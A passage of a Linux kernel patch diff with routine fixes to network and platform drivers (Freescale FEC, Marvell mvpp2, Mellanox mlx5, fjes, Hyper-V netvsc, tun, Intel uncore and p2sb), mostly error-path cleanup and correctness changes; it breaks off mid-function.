+diff --git a/drivers/net/ethernet/freescale/fec_main.c b/drivers/net/ethernet/freescale/fec_main.c
+index 6d1b760022821..97d12c7eea772 100644
+--- a/drivers/net/ethernet/freescale/fec_main.c
++++ b/drivers/net/ethernet/freescale/fec_main.c
+@@ -1917,6 +1917,7 @@ static void fec_enet_adjust_link(struct net_device *ndev)
+ 
+ 		/* if any of the above changed restart the FEC */
+ 		if (status_change) {
++			netif_stop_queue(ndev);
+ 			napi_disable(&fep->napi);
+ 			netif_tx_lock_bh(ndev);
+ 			fec_restart(ndev);
+@@ -1926,6 +1927,7 @@ static void fec_enet_adjust_link(struct net_device *ndev)
+ 		}
+ 	} else {
+ 		if (fep->link) {
++			netif_stop_queue(ndev);
+ 			napi_disable(&fep->napi);
+ 			netif_tx_lock_bh(ndev);
+ 			fec_stop(ndev);
+diff --git a/drivers/net/ethernet/marvell/mvpp2/mvpp2_main.c b/drivers/net/ethernet/marvell/mvpp2/mvpp2_main.c
+index f936640cca4e6..2f80ee84c7ece 100644
+--- a/drivers/net/ethernet/marvell/mvpp2/mvpp2_main.c
++++ b/drivers/net/ethernet/marvell/mvpp2/mvpp2_main.c
+@@ -614,12 +614,38 @@ static void mvpp23_bm_set_8pool_mode(struct mvpp2 *priv)
+ 	mvpp2_write(priv, MVPP22_BM_POOL_BASE_ADDR_HIGH_REG, val);
+ }
+ 
++/* Cleanup pool before actual initialization in the OS */
++static void mvpp2_bm_pool_cleanup(struct mvpp2 *priv, int pool_id)
++{
++	unsigned int thread = mvpp2_cpu_to_thread(priv, get_cpu());
++	u32 val;
++	int i;
++
++	/* Drain the BM from all possible residues left by firmware */
++	for (i = 0; i < MVPP2_BM_POOL_SIZE_MAX; i++)
++		mvpp2_thread_read(priv, thread, MVPP2_BM_PHY_ALLOC_REG(pool_id));
++
++	put_cpu();
++
++	/* Stop the BM pool */
++	val = mvpp2_read(priv, MVPP2_BM_POOL_CTRL_REG(pool_id));
++	val |= MVPP2_BM_STOP_MASK;
++	mvpp2_write(priv, MVPP2_BM_POOL_CTRL_REG(pool_id), val);
++}
++
+ static int mvpp2_bm_init(struct device *dev, struct mvpp2 *priv)
+ {
+ 	enum dma_data_direction dma_dir = DMA_FROM_DEVICE;
+ 	int i, err, poolnum = MVPP2_BM_POOLS_NUM;
+ 	struct mvpp2_port *port;
+ 
++	if (priv->percpu_pools)
++		poolnum = mvpp2_get_nrxqs(priv) * 2;
++
++	/* Clean up the pool state in case it contains stale state */
++	for (i = 0; i < poolnum; i++)
++		mvpp2_bm_pool_cleanup(priv, i);
++
+ 	if (priv->percpu_pools) {
+ 		for (i = 0; i < priv->port_count; i++) {
+ 			port = priv->port_list[i];
+@@ -629,7 +655,6 @@ static int mvpp2_bm_init(struct device *dev, struct mvpp2 *priv)
+ 			}
+ 		}
+ 
+-		poolnum = mvpp2_get_nrxqs(priv) * 2;
+ 		for (i = 0; i < poolnum; i++) {
+ 			/* the pool in use */
+ 			int pn = i / (poolnum / 2);
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en/fs_tt_redirect.c b/drivers/net/ethernet/mellanox/mlx5/core/en/fs_tt_redirect.c
+index e1283531e0b81..671adbad0a40f 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en/fs_tt_redirect.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en/fs_tt_redirect.c
+@@ -436,6 +436,7 @@ static int fs_any_create_groups(struct mlx5e_flow_table *ft)
+ 	in = kvzalloc(inlen, GFP_KERNEL);
+ 	if  (!in || !ft->g) {
+ 		kfree(ft->g);
++		ft->g = NULL;
+ 		kvfree(in);
+ 		return -ENOMEM;
+ 	}
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en/params.c b/drivers/net/ethernet/mellanox/mlx5/core/en/params.c
+index 29dd3a04c1545..d3de1b7a80bf5 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en/params.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en/params.c
+@@ -990,8 +990,8 @@ void mlx5e_build_sq_param(struct mlx5_core_dev *mdev,
+ 	void *wq = MLX5_ADDR_OF(sqc, sqc, wq);
+ 	bool allow_swp;
+ 
+-	allow_swp =
+-		mlx5_geneve_tx_allowed(mdev) || !!mlx5_ipsec_device_caps(mdev);
++	allow_swp = mlx5_geneve_tx_allowed(mdev) ||
++		    (mlx5_ipsec_device_caps(mdev) & MLX5_IPSEC_CAP_CRYPTO);
+ 	mlx5e_build_sq_param_common(mdev, param);
+ 	MLX5_SET(wq, wq, log_wq_sz, params->log_sq_size);
+ 	MLX5_SET(sqc, sqc, allow_swp, allow_swp);
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_accel/ipsec.h b/drivers/net/ethernet/mellanox/mlx5/core/en_accel/ipsec.h
+index 16bcceec16c44..785f188148d8f 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_accel/ipsec.h
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_accel/ipsec.h
+@@ -34,7 +34,6 @@
+ #ifndef __MLX5E_IPSEC_H__
+ #define __MLX5E_IPSEC_H__
+ 
+-#ifdef CONFIG_MLX5_EN_IPSEC
+ 
+ #include <linux/mlx5/device.h>
+ #include <net/xfrm.h>
+@@ -146,6 +145,7 @@ struct mlx5e_ipsec_sa_entry {
+ 	struct mlx5e_ipsec_modify_state_work modify_work;
+ };
+ 
++#ifdef CONFIG_MLX5_EN_IPSEC
+ int mlx5e_ipsec_init(struct mlx5e_priv *priv);
+ void mlx5e_ipsec_cleanup(struct mlx5e_priv *priv);
+ void mlx5e_ipsec_build_netdev(struct mlx5e_priv *priv);
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_arfs.c b/drivers/net/ethernet/mellanox/mlx5/core/en_arfs.c
+index dc0a0a27ac84a..58eacba6de8cd 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_arfs.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_arfs.c
+@@ -255,11 +255,13 @@ static int arfs_create_groups(struct mlx5e_flow_table *ft,
+ 
+ 	ft->g = kcalloc(MLX5E_ARFS_NUM_GROUPS,
+ 			sizeof(*ft->g), GFP_KERNEL);
+-	in = kvzalloc(inlen, GFP_KERNEL);
+-	if  (!in || !ft->g) {
+-		kfree(ft->g);
+-		kvfree(in);
++	if (!ft->g)
+ 		return -ENOMEM;
++
++	in = kvzalloc(inlen, GFP_KERNEL);
++	if (!in) {
++		err = -ENOMEM;
++		goto err_free_g;
+ 	}
+ 
+ 	mc = MLX5_ADDR_OF(create_flow_group_in, in, match_criteria);
+@@ -279,7 +281,7 @@ static int arfs_create_groups(struct mlx5e_flow_table *ft,
+ 		break;
+ 	default:
+ 		err = -EINVAL;
+-		goto out;
++		goto err_free_in;
+ 	}
+ 
+ 	switch (type) {
+@@ -301,7 +303,7 @@ static int arfs_create_groups(struct mlx5e_flow_table *ft,
+ 		break;
+ 	default:
+ 		err = -EINVAL;
+-		goto out;
++		goto err_free_in;
+ 	}
+ 
+ 	MLX5_SET_CFG(in, match_criteria_enable, MLX5_MATCH_OUTER_HEADERS);
+@@ -310,7 +312,7 @@ static int arfs_create_groups(struct mlx5e_flow_table *ft,
+ 	MLX5_SET_CFG(in, end_flow_index, ix - 1);
+ 	ft->g[ft->num_groups] = mlx5_create_flow_group(ft->t, in);
+ 	if (IS_ERR(ft->g[ft->num_groups]))
+-		goto err;
++		goto err_clean_group;
+ 	ft->num_groups++;
+ 
+ 	memset(in, 0, inlen);
+@@ -319,18 +321,20 @@ static int arfs_create_groups(struct mlx5e_flow_table *ft,
+ 	MLX5_SET_CFG(in, end_flow_index, ix - 1);
+ 	ft->g[ft->num_groups] = mlx5_create_flow_group(ft->t, in);
+ 	if (IS_ERR(ft->g[ft->num_groups]))
+-		goto err;
++		goto err_clean_group;
+ 	ft->num_groups++;
+ 
+ 	kvfree(in);
+ 	return 0;
+ 
+-err:
++err_clean_group:
+ 	err = PTR_ERR(ft->g[ft->num_groups]);
+ 	ft->g[ft->num_groups] = NULL;
+-out:
++err_free_in:
+ 	kvfree(in);
+-
++err_free_g:
++	kfree(ft->g);
++	ft->g = NULL;
+ 	return err;
+ }
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/lib/aso.c b/drivers/net/ethernet/mellanox/mlx5/core/lib/aso.c
+index c971ff04dd046..c215252f2f534 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/lib/aso.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/lib/aso.c
+@@ -98,7 +98,7 @@ static int create_aso_cq(struct mlx5_aso_cq *cq, void *cqc_data)
+ 	mlx5_fill_page_frag_array(&cq->wq_ctrl.buf,
+ 				  (__be64 *)MLX5_ADDR_OF(create_cq_in, in, pas));
+ 
+-	MLX5_SET(cqc,   cqc, cq_period_mode, DIM_CQ_PERIOD_MODE_START_FROM_EQE);
++	MLX5_SET(cqc,   cqc, cq_period_mode, MLX5_CQ_PERIOD_MODE_START_FROM_EQE);
+ 	MLX5_SET(cqc,   cqc, c_eqn_or_apu_element, eqn);
+ 	MLX5_SET(cqc,   cqc, uar_page,      mdev->priv.uar->index);
+ 	MLX5_SET(cqc,   cqc, log_page_size, cq->wq_ctrl.buf.page_shift -
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/steering/dr_action.c b/drivers/net/ethernet/mellanox/mlx5/core/steering/dr_action.c
+index a3e7602b044e5..bf7517725d8c6 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/steering/dr_action.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/steering/dr_action.c
+@@ -673,6 +673,7 @@ int mlx5dr_actions_build_ste_arr(struct mlx5dr_matcher *matcher,
+ 		switch (action_type) {
+ 		case DR_ACTION_TYP_DROP:
+ 			attr.final_icm_addr = nic_dmn->drop_icm_addr;
++			attr.hit_gvmi = nic_dmn->drop_icm_addr >> 48;
+ 			break;
+ 		case DR_ACTION_TYP_FT:
+ 			dest_action = action;
+@@ -761,11 +762,17 @@ int mlx5dr_actions_build_ste_arr(struct mlx5dr_matcher *matcher,
+ 							action->sampler->tx_icm_addr;
+ 			break;
+ 		case DR_ACTION_TYP_VPORT:
+-			attr.hit_gvmi = action->vport->caps->vhca_gvmi;
+-			dest_action = action;
+-			attr.final_icm_addr = rx_rule ?
+-				action->vport->caps->icm_address_rx :
+-				action->vport->caps->icm_address_tx;
++			if (unlikely(rx_rule && action->vport->caps->num == MLX5_VPORT_UPLINK)) {
++				/* can't go to uplink on RX rule - dropping instead */
++				attr.final_icm_addr = nic_dmn->drop_icm_addr;
++				attr.hit_gvmi = nic_dmn->drop_icm_addr >> 48;
++			} else {
++				attr.hit_gvmi = action->vport->caps->vhca_gvmi;
++				dest_action = action;
++				attr.final_icm_addr = rx_rule ?
++						      action->vport->caps->icm_address_rx :
++						      action->vport->caps->icm_address_tx;
++			}
+ 			break;
+ 		case DR_ACTION_TYP_POP_VLAN:
+ 			if (!rx_rule && !(dmn->ste_ctx->actions_caps &
+diff --git a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
+index 8f8de14347a94..e988a60c8561b 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
++++ b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
+@@ -7166,6 +7166,9 @@ int stmmac_dvr_probe(struct device *device,
+ 		dev_err(priv->device, "unable to bring out of ahb reset: %pe\n",
+ 			ERR_PTR(ret));
+ 
++	/* Wait a bit for the reset to take effect */
++	udelay(10);
++
+ 	/* Init MAC and get the capabilities */
+ 	ret = stmmac_hw_init(priv);
+ 	if (ret)
+diff --git a/drivers/net/fjes/fjes_hw.c b/drivers/net/fjes/fjes_hw.c
+index 704e949484d0c..b9b5554ea8620 100644
+--- a/drivers/net/fjes/fjes_hw.c
++++ b/drivers/net/fjes/fjes_hw.c
+@@ -221,21 +221,25 @@ static int fjes_hw_setup(struct fjes_hw *hw)
+ 
+ 	mem_size = FJES_DEV_REQ_BUF_SIZE(hw->max_epid);
+ 	hw->hw_info.req_buf = kzalloc(mem_size, GFP_KERNEL);
+-	if (!(hw->hw_info.req_buf))
+-		return -ENOMEM;
++	if (!(hw->hw_info.req_buf)) {
++		result = -ENOMEM;
++		goto free_ep_info;
++	}
+ 
+ 	hw->hw_info.req_buf_size = mem_size;
+ 
+ 	mem_size = FJES_DEV_RES_BUF_SIZE(hw->max_epid);
+ 	hw->hw_info.res_buf = kzalloc(mem_size, GFP_KERNEL);
+-	if (!(hw->hw_info.res_buf))
+-		return -ENOMEM;
++	if (!(hw->hw_info.res_buf)) {
++		result = -ENOMEM;
++		goto free_req_buf;
++	}
+ 
+ 	hw->hw_info.res_buf_size = mem_size;
+ 
+ 	result = fjes_hw_alloc_shared_status_region(hw);
+ 	if (result)
+-		return result;
++		goto free_res_buf;
+ 
+ 	hw->hw_info.buffer_share_bit = 0;
+ 	hw->hw_info.buffer_unshare_reserve_bit = 0;
+@@ -246,11 +250,11 @@ static int fjes_hw_setup(struct fjes_hw *hw)
+ 
+ 			result = fjes_hw_alloc_epbuf(&buf_pair->tx);
+ 			if (result)
+-				return result;
++				goto free_epbuf;
+ 
+ 			result = fjes_hw_alloc_epbuf(&buf_pair->rx);
+ 			if (result)
+-				return result;
++				goto free_epbuf;
+ 
+ 			spin_lock_irqsave(&hw->rx_status_lock, flags);
+ 			fjes_hw_setup_epbuf(&buf_pair->tx, mac,
+@@ -273,6 +277,25 @@ static int fjes_hw_setup(struct fjes_hw *hw)
+ 	fjes_hw_init_command_registers(hw, &param);
+ 
+ 	return 0;
++
++free_epbuf:
++	for (epidx = 0; epidx < hw->max_epid ; epidx++) {
++		if (epidx == hw->my_epid)
++			continue;
++		fjes_hw_free_epbuf(&hw->ep_shm_info[epidx].tx);
++		fjes_hw_free_epbuf(&hw->ep_shm_info[epidx].rx);
++	}
++	fjes_hw_free_shared_status_region(hw);
++free_res_buf:
++	kfree(hw->hw_info.res_buf);
++	hw->hw_info.res_buf = NULL;
++free_req_buf:
++	kfree(hw->hw_info.req_buf);
++	hw->hw_info.req_buf = NULL;
++free_ep_info:
++	kfree(hw->ep_shm_info);
++	hw->ep_shm_info = NULL;
++	return result;
+ }
+ 
+ static void fjes_hw_cleanup(struct fjes_hw *hw)
+diff --git a/drivers/net/hyperv/netvsc_drv.c b/drivers/net/hyperv/netvsc_drv.c
+index 0285894c892ab..c1aac6ceb29e6 100644
+--- a/drivers/net/hyperv/netvsc_drv.c
++++ b/drivers/net/hyperv/netvsc_drv.c
+@@ -44,7 +44,7 @@
+ 
+ static unsigned int ring_size __ro_after_init = 128;
+ module_param(ring_size, uint, 0444);
+-MODULE_PARM_DESC(ring_size, "Ring buffer size (# of pages)");
++MODULE_PARM_DESC(ring_size, "Ring buffer size (# of 4K pages)");
+ unsigned int netvsc_ring_bytes __ro_after_init;
+ 
+ static const u32 default_msg = NETIF_MSG_DRV | NETIF_MSG_PROBE |
+@@ -2801,7 +2801,7 @@ static int __init netvsc_drv_init(void)
+ 		pr_info("Increased ring_size to %u (min allowed)\n",
+ 			ring_size);
+ 	}
+-	netvsc_ring_bytes = ring_size * PAGE_SIZE;
++	netvsc_ring_bytes = VMBUS_RING_SIZE(ring_size * 4096);
+ 
+ 	register_netdevice_notifier(&netvsc_netdev_notifier);
+ 
+diff --git a/drivers/net/phy/micrel.c b/drivers/net/phy/micrel.c
+index 7cbcf51bae924..9481f172830f5 100644
+--- a/drivers/net/phy/micrel.c
++++ b/drivers/net/phy/micrel.c
+@@ -120,6 +120,11 @@
+  */
+ #define LAN8814_1PPM_FORMAT			17179
+ 
++#define PTP_RX_VERSION				0x0248
++#define PTP_TX_VERSION				0x0288
++#define PTP_MAX_VERSION(x)			(((x) & GENMASK(7, 0)) << 8)
++#define PTP_MIN_VERSION(x)			((x) & GENMASK(7, 0))
++
+ #define PTP_RX_MOD				0x024F
+ #define PTP_RX_MOD_BAD_UDPV4_CHKSUM_FORCE_FCS_DIS_ BIT(3)
+ #define PTP_RX_TIMESTAMP_EN			0x024D
+@@ -2922,6 +2927,12 @@ static void lan8814_ptp_init(struct phy_device *phydev)
+ 	lanphy_write_page_reg(phydev, 5, PTP_TX_PARSE_IP_ADDR_EN, 0);
+ 	lanphy_write_page_reg(phydev, 5, PTP_RX_PARSE_IP_ADDR_EN, 0);
+ 
++	/* Disable checking for minorVersionPTP field */
++	lanphy_write_page_reg(phydev, 5, PTP_RX_VERSION,
++			      PTP_MAX_VERSION(0xff) | PTP_MIN_VERSION(0x0));
++	lanphy_write_page_reg(phydev, 5, PTP_TX_VERSION,
++			      PTP_MAX_VERSION(0xff) | PTP_MIN_VERSION(0x0));
++
+ 	skb_queue_head_init(&ptp_priv->tx_queue);
+ 	skb_queue_head_init(&ptp_priv->rx_queue);
+ 	INIT_LIST_HEAD(&ptp_priv->rx_ts_list);
+diff --git a/drivers/net/tun.c b/drivers/net/tun.c
+index d373953ddc300..367255bb44cdc 100644
+--- a/drivers/net/tun.c
++++ b/drivers/net/tun.c
+@@ -1622,13 +1622,19 @@ static int tun_xdp_act(struct tun_struct *tun, struct bpf_prog *xdp_prog,
+ 	switch (act) {
+ 	case XDP_REDIRECT:
+ 		err = xdp_do_redirect(tun->dev, xdp, xdp_prog);
+-		if (err)
++		if (err) {
++			dev_core_stats_rx_dropped_inc(tun->dev);
+ 			return err;
++		}
++		dev_sw_netstats_rx_add(tun->dev, xdp->data_end - xdp->data);
+ 		break;
+ 	case XDP_TX:
+ 		err = tun_xdp_tx(tun->dev, xdp);
+-		if (err < 0)
++		if (err < 0) {
++			dev_core_stats_rx_dropped_inc(tun->dev);
+ 			return err;
++		}
++		dev_sw_netstats_rx_add(tun->dev, xdp->data_end - xdp->data);
+ 		break;
+ 	case XDP_PASS:
+ 		break;
+diff --git a/drivers/net/wireless/intel/iwlwifi/iwl-dbg-tlv.c b/drivers/net/wireless/intel/iwlwifi/iwl-dbg-tlv.c
+index a1d34f3e7a9f4..5979d904bbbd2 100644
+--- a/drivers/net/wireless/intel/iwlwifi/iwl-dbg-tlv.c
++++ b/drivers/net/wireless/intel/iwlwifi/iwl-dbg-tlv.c
+@@ -1082,7 +1082,7 @@ static int iwl_dbg_tlv_override_trig_node(struct iwl_fw_runtime *fwrt,
+ 		node_trig = (void *)node_tlv->data;
+ 	}
+ 
+-	memcpy(node_trig->data + offset, trig->data, trig_data_len);
++	memcpy((u8 *)node_trig->data + offset, trig->data, trig_data_len);
+ 	node_tlv->length = cpu_to_le32(size);
+ 
+ 	if (policy & IWL_FW_INI_APPLY_POLICY_OVERRIDE_CFG) {
+diff --git a/drivers/opp/core.c b/drivers/opp/core.c
+index f0d70ecc0271b..71d3e3ba909a3 100644
+--- a/drivers/opp/core.c
++++ b/drivers/opp/core.c
+@@ -1226,12 +1226,12 @@ int dev_pm_opp_set_rate(struct device *dev, unsigned long target_freq)
+ 		 * value of the frequency. In such a case, do not abort but
+ 		 * configure the hardware to the desired frequency forcefully.
+ 		 */
+-		forced = opp_table->rate_clk_single != target_freq;
++		forced = opp_table->rate_clk_single != freq;
+ 	}
+ 
+-	ret = _set_opp(dev, opp_table, opp, &target_freq, forced);
++	ret = _set_opp(dev, opp_table, opp, &freq, forced);
+ 
+-	if (target_freq)
++	if (freq)
+ 		dev_pm_opp_put(opp);
+ 
+ put_opp_table:
+diff --git a/drivers/parisc/power.c b/drivers/parisc/power.c
+index 332bcc0053a5e..498bae2e3403c 100644
+--- a/drivers/parisc/power.c
++++ b/drivers/parisc/power.c
+@@ -238,7 +238,7 @@ static int __init power_init(void)
+ 	if (running_on_qemu && soft_power_reg)
+ 		register_sys_off_handler(SYS_OFF_MODE_POWER_OFF, SYS_OFF_PRIO_DEFAULT,
+ 					qemu_power_off, (void *)soft_power_reg);
+-	else
++	if (!running_on_qemu || soft_power_reg)
+ 		power_task = kthread_run(kpowerswd, (void*)soft_power_reg,
+ 					KTHREAD_NAME);
+ 	if (IS_ERR(power_task)) {
+diff --git a/drivers/platform/x86/intel/uncore-frequency/uncore-frequency-common.c b/drivers/platform/x86/intel/uncore-frequency/uncore-frequency-common.c
+index 9b12fe8e95c91..dd2e654daf4b1 100644
+--- a/drivers/platform/x86/intel/uncore-frequency/uncore-frequency-common.c
++++ b/drivers/platform/x86/intel/uncore-frequency/uncore-frequency-common.c
+@@ -74,30 +74,30 @@ static ssize_t show_perf_status_freq_khz(struct uncore_data *data, char *buf)
+ }
+ 
+ #define store_uncore_min_max(name, min_max)				\
+-	static ssize_t store_##name(struct device *dev,		\
+-				     struct device_attribute *attr,	\
++	static ssize_t store_##name(struct kobject *kobj,		\
++				     struct kobj_attribute *attr,	\
+ 				     const char *buf, size_t count)	\
+ 	{								\
+-		struct uncore_data *data = container_of(attr, struct uncore_data, name##_dev_attr);\
++		struct uncore_data *data = container_of(attr, struct uncore_data, name##_kobj_attr);\
+ 									\
+ 		return store_min_max_freq_khz(data, buf, count,	\
+ 					      min_max);		\
+ 	}
+ 
+ #define show_uncore_min_max(name, min_max)				\
+-	static ssize_t show_##name(struct device *dev,		\
+-				    struct device_attribute *attr, char *buf)\
++	static ssize_t show_##name(struct kobject *kobj,		\
++				    struct kobj_attribute *attr, char *buf)\
+ 	{                                                               \
+-		struct uncore_data *data = container_of(attr, struct uncore_data, name##_dev_attr);\
++		struct uncore_data *data = container_of(attr, struct uncore_data, name##_kobj_attr);\
+ 									\
+ 		return show_min_max_freq_khz(data, buf, min_max);	\
+ 	}
+ 
+ #define show_uncore_perf_status(name)					\
+-	static ssize_t show_##name(struct device *dev,		\
+-				   struct device_attribute *attr, char *buf)\
++	static ssize_t show_##name(struct kobject *kobj,		\
++				   struct kobj_attribute *attr, char *buf)\
+ 	{                                                               \
+-		struct uncore_data *data = container_of(attr, struct uncore_data, name##_dev_attr);\
++		struct uncore_data *data = container_of(attr, struct uncore_data, name##_kobj_attr);\
+ 									\
+ 		return show_perf_status_freq_khz(data, buf); \
+ 	}
+@@ -111,11 +111,11 @@ show_uncore_min_max(max_freq_khz, 1);
+ show_uncore_perf_status(current_freq_khz);
+ 
+ #define show_uncore_data(member_name)					\
+-	static ssize_t show_##member_name(struct device *dev,	\
+-					   struct device_attribute *attr, char *buf)\
++	static ssize_t show_##member_name(struct kobject *kobj,	\
++					   struct kobj_attribute *attr, char *buf)\
+ 	{                                                               \
+ 		struct uncore_data *data = container_of(attr, struct uncore_data,\
+-							  member_name##_dev_attr);\
++							  member_name##_kobj_attr);\
+ 									\
+ 		return sysfs_emit(buf, "%u\n",				\
+ 				 data->member_name);			\
+@@ -126,29 +126,29 @@ show_uncore_data(initial_max_freq_khz);
+ 
+ #define init_attribute_rw(_name)					\
+ 	do {								\
+-		sysfs_attr_init(&data->_name##_dev_attr.attr);	\
+-		data->_name##_dev_attr.show = show_##_name;		\
+-		data->_name##_dev_attr.store = store_##_name;		\
+-		data->_name##_dev_attr.attr.name = #_name;		\
+-		data->_name##_dev_attr.attr.mode = 0644;		\
++		sysfs_attr_init(&data->_name##_kobj_attr.attr);	\
++		data->_name##_kobj_attr.show = show_##_name;		\
++		data->_name##_kobj_attr.store = store_##_name;		\
++		data->_name##_kobj_attr.attr.name = #_name;		\
++		data->_name##_kobj_attr.attr.mode = 0644;		\
+ 	} while (0)
+ 
+ #define init_attribute_ro(_name)					\
+ 	do {								\
+-		sysfs_attr_init(&data->_name##_dev_attr.attr);	\
+-		data->_name##_dev_attr.show = show_##_name;		\
+-		data->_name##_dev_attr.store = NULL;			\
+-		data->_name##_dev_attr.attr.name = #_name;		\
+-		data->_name##_dev_attr.attr.mode = 0444;		\
++		sysfs_attr_init(&data->_name##_kobj_attr.attr);	\
++		data->_name##_kobj_attr.show = show_##_name;		\
++		data->_name##_kobj_attr.store = NULL;			\
++		data->_name##_kobj_attr.attr.name = #_name;		\
++		data->_name##_kobj_attr.attr.mode = 0444;		\
+ 	} while (0)
+ 
+ #define init_attribute_root_ro(_name)					\
+ 	do {								\
+-		sysfs_attr_init(&data->_name##_dev_attr.attr);	\
+-		data->_name##_dev_attr.show = show_##_name;		\
+-		data->_name##_dev_attr.store = NULL;			\
+-		data->_name##_dev_attr.attr.name = #_name;		\
+-		data->_name##_dev_attr.attr.mode = 0400;		\
++		sysfs_attr_init(&data->_name##_kobj_attr.attr);	\
++		data->_name##_kobj_attr.show = show_##_name;		\
++		data->_name##_kobj_attr.store = NULL;			\
++		data->_name##_kobj_attr.attr.name = #_name;		\
++		data->_name##_kobj_attr.attr.mode = 0400;		\
+ 	} while (0)
+ 
+ static int create_attr_group(struct uncore_data *data, char *name)
+@@ -161,14 +161,14 @@ static int create_attr_group(struct uncore_data *data, char *name)
+ 	init_attribute_ro(initial_max_freq_khz);
+ 	init_attribute_root_ro(current_freq_khz);
+ 
+-	data->uncore_attrs[index++] = &data->max_freq_khz_dev_attr.attr;
+-	data->uncore_attrs[index++] = &data->min_freq_khz_dev_attr.attr;
+-	data->uncore_attrs[index++] = &data->initial_min_freq_khz_dev_attr.attr;
+-	data->uncore_attrs[index++] = &data->initial_max_freq_khz_dev_attr.attr;
++	data->uncore_attrs[index++] = &data->max_freq_khz_kobj_attr.attr;
++	data->uncore_attrs[index++] = &data->min_freq_khz_kobj_attr.attr;
++	data->uncore_attrs[index++] = &data->initial_min_freq_khz_kobj_attr.attr;
++	data->uncore_attrs[index++] = &data->initial_max_freq_khz_kobj_attr.attr;
+ 
+ 	ret = uncore_read_freq(data, &freq);
+ 	if (!ret)
+-		data->uncore_attrs[index++] = &data->current_freq_khz_dev_attr.attr;
++		data->uncore_attrs[index++] = &data->current_freq_khz_kobj_attr.attr;
+ 
+ 	data->uncore_attrs[index] = NULL;
+ 
+diff --git a/drivers/platform/x86/intel/uncore-frequency/uncore-frequency-common.h b/drivers/platform/x86/intel/uncore-frequency/uncore-frequency-common.h
+index f5dcfa2fb2857..2d9dc3151d6ef 100644
+--- a/drivers/platform/x86/intel/uncore-frequency/uncore-frequency-common.h
++++ b/drivers/platform/x86/intel/uncore-frequency/uncore-frequency-common.h
+@@ -23,11 +23,11 @@
+  * @die_id:		Die id for this instance
+  * @name:		Sysfs entry name for this instance
+  * @uncore_attr_group:	Attribute group storage
+- * @max_freq_khz_dev_attr: Storage for device attribute max_freq_khz
+- * @mix_freq_khz_dev_attr: Storage for device attribute min_freq_khz
+- * @initial_max_freq_khz_dev_attr: Storage for device attribute initial_max_freq_khz
+- * @initial_min_freq_khz_dev_attr: Storage for device attribute initial_min_freq_khz
+- * @current_freq_khz_dev_attr: Storage for device attribute current_freq_khz
++ * @max_freq_khz_dev_attr: Storage for kobject attribute max_freq_khz
++ * @mix_freq_khz_dev_attr: Storage for kobject attribute min_freq_khz
++ * @initial_max_freq_khz_dev_attr: Storage for kobject attribute initial_max_freq_khz
++ * @initial_min_freq_khz_dev_attr: Storage for kobject attribute initial_min_freq_khz
++ * @current_freq_khz_dev_attr: Storage for kobject attribute current_freq_khz
+  * @uncore_attrs:	Attribute storage for group creation
+  *
+  * This structure is used to encapsulate all data related to uncore sysfs
+@@ -44,11 +44,11 @@ struct uncore_data {
+ 	char name[32];
+ 
+ 	struct attribute_group uncore_attr_group;
+-	struct device_attribute max_freq_khz_dev_attr;
+-	struct device_attribute min_freq_khz_dev_attr;
+-	struct device_attribute initial_max_freq_khz_dev_attr;
+-	struct device_attribute initial_min_freq_khz_dev_attr;
+-	struct device_attribute current_freq_khz_dev_attr;
++	struct kobj_attribute max_freq_khz_kobj_attr;
++	struct kobj_attribute min_freq_khz_kobj_attr;
++	struct kobj_attribute initial_max_freq_khz_kobj_attr;
++	struct kobj_attribute initial_min_freq_khz_kobj_attr;
++	struct kobj_attribute current_freq_khz_kobj_attr;
+ 	struct attribute *uncore_attrs[6];
+ };
+ 
+diff --git a/drivers/platform/x86/p2sb.c b/drivers/platform/x86/p2sb.c
+index 1cf2471d54dde..17cc4b45e0239 100644
+--- a/drivers/platform/x86/p2sb.c
++++ b/drivers/platform/x86/p2sb.c
+@@ -26,6 +26,21 @@ static const struct x86_cpu_id p2sb_cpu_ids[] = {
+ 	{}
+ };
+ 
++/*
++ * Cache BAR0 of P2SB device functions 0 to 7.
++ * TODO: The constant 8 is the number of functions that PCI specification
++ *       defines. Same definitions exist tree-wide. Unify this definition and
++ *       the other definitions then move to include/uapi/linux/pci.h.
++ */
++#define NR_P2SB_RES_CACHE 8
++
++struct p2sb_res_cache {
++	u32 bus_dev_id;
++	struct resource res;
++};
++
++static struct p2sb_res_cache p2sb_resources[NR_P2SB_RES_CACHE];
++
+ static int p2sb_get_devfn(unsigned int *devfn)
+ {
+ 	unsigned int fn = P2SB_DEVFN_DEFAULT;
+@@ -39,8 +54,16 @@ static int p2sb_get_devfn(unsigned int *devfn)
+ 	return 0;
+ }
+ 
++static bool p2sb_valid_resource(struct resource *res)
++{
++	if (res->flags)
++		return true;
++
++	return false;
++}
++
+ /* Copy resource from the first BAR of the device in question */
+-static int p2sb_read_bar0(struct pci_dev *pdev, struct resource *mem)
++static void p2sb_read_bar0(struct pci_dev *pdev, struct resource *mem)
+ {
+ 	struct resource *bar0 = &pdev->resource[0];
+ 
+@@ -56,49 +79,66 @@ static int p2sb_read_bar0(struct pci_dev *pdev, struct resource *mem)
+ 	mem->end = bar0->end;
+ 	mem->flags = bar0->flags;
+ 	mem->desc = bar0->desc;
+-
+-	return 0;
+ }
+ 
+-static int p2sb_scan_and_read(struct pci_bus *bus, unsigned int devfn, struct resource *mem)
++static void p2sb_scan_and_cache_devfn(struct pci_bus *bus, unsigned int devfn)
+ {
++	struct p2sb_res_cache *cache = &p2sb_resources[PCI_FUNC(devfn)];
